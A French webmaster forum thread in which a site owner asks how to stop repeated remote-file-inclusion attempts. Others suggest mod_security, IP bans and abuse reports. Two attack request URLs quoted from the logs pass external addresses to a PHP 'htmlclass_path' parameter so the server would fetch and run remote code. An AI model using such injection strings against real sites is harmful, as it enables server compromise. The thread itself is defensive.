Bonjour.

Cela fait maintenant plus d'une semaine qu'une personne ou un robot essaie de hacker mon site. Je n'arrête pas de recevoir des notifications d'erreurs 404. L'URL recherché est toujours de la même forme :

Exemples :

1) [RACINE DE MON SITE]/webmaster-phphtml/phphtml.php?htmlclass_path=http://www.geocities.com/dinarisma/new.gif???

2) [RACINE DE MON SITE]/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt?

Savez-vous comment je peux arrêter ces [$^ù$^ù#"&] ???

Merci.

Bonjour,

il fait plusieurs attaques à la seconde ?

Comme tu es en dédié il y a le mod_evasive et le mod security qui peuvetn être utile

Je sais pas ce qu'il essaie de faire mais je pense qu'il croit que j'utilise Joomla...

Il y a à priori peu de chances que ce genre d'attaque passent, sauf de faire tomber le serveur momentanément par surcharge et encore.

Par précaution, tu peux tout de même essayer de voir quels ip sont utilisées pour ces urls, et s'il n'y en a pas trop, les bannir quelques temps ...

Et si tu es motivé => hack / spam report au fournisseur de l'ip, tu peux trouver les contact par le Whois => http://www.dnsstuff.com/

Un bon mail avec les logs concernés, ça peut avoir quelques conséquences sur l'auteur en fonction du propriétaire de l'ip

Hm.... intéressant !

Salut, je ne m'y connais pas trop, mais il exploite une soit disant faille de ton site pour te faire executer ce fichier :http://www.motociclismo.pt/images/Equipa/jpg.txt

Je ne parviens pas a savoir ce qu'il peut faire

mm, c'est une collection de petites fonctions pour hacker le serveur, dans le cas ou il y aurai des droits d'exécution dans le dossier.
Si tu as ça, c'est qu'a priori quelqu'un a réussi à le mettre là, si c'est pas toi, il est temps de bien vérifier ton site et ta db, histoire de voir si ce fichier a été utilisé ou pas.
Faudrait aussi restreindre les accès le plus possible au dossier dans le quel ce fichier est apparu.

Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !

ibost a écrit:Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !

De quoi tu parles

Je parle de sites hébergés sous Geocities ou des sites en noms de domaines propres. Enfin bref je vais essayer de bloquer leur IP.

Merci !